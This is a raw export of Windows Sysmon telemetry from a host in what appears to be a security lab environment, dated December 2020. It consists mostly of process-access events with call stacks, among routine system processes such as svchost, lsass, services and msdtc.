13:55:22.470{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006657Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.470{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006656Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.470{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006655Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.470{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006654Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.470{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006653Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.470{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-85CA-5FCF-FE00-000000009101}3664C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006652Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.470{10ACEC4A-853E-5FCF-0A00-000000009101}8521288C:\Windows\system32\services.exe{10ACEC4A-85CA-5FCF-FE00-000000009101}3664C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+316d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006651Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.475{10ACEC4A-85CA-5FCF-FE00-000000009101}3664C:\Windows\System32\msdtc.exe2001.12.10941.16384 (rs1_release.160715-1616)Microsoft Distributed Transaction Coordinator ServiceMicrosoft® Windows® Operating SystemMicrosoft CorporationMSDTC.EXEC:\Windows\System32\msdtc.exeC:\Windows\system32\NT AUTHORITY\NETWORK SERVICE{10ACEC4A-8540-5FCF-E403-000000000000}0x3e40SystemMD5=308F08347923DEEDE7BC03EC7D485841,SHA256=72DB45CA11FE635DF9F8273C38CBEFB8DF5362ADA0CBF6D2B1E570365DC700C0,IMPHASH=D02F3DF332409C5D3F34BA2D38FC4ED4{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000006650Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.470{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006649Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.470{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006648Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.470{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006647Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.329{10ACEC4A-853E-5FCF-0A00-000000009101}852936C:\Windows\system32\services.exe{10ACEC4A-85CA-5FCF-FD00-000000009101}4748C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006646Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.329{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-85CA-5FCF-FD00-000000009101}4748C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006645Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.329{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-85CA-5FCF-FD00-000000009101}4748C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006644Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.329{10ACEC4A-853E-5FCF-0A00-000000009101}8521288C:\Windows\system32\services.exe{10ACEC4A-85CA-5FCF-FD00-000000009101}4748C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+316d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006643Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.329{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006642Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.329{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006641Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.329{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006640Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.204{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006639Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.204{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006638Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.204{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006637Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.126{10ACEC4A-8541-5FCF-1400-000000009101}12681416C:\Windows\System32\svchost.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+4609|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006636Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.126{10ACEC4A-8541-5FCF-1400-000000009101}12681416C:\Windows\System32\svchost.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+2e77|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006635Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.080{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006634Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.080{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006633Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.080{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006684Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 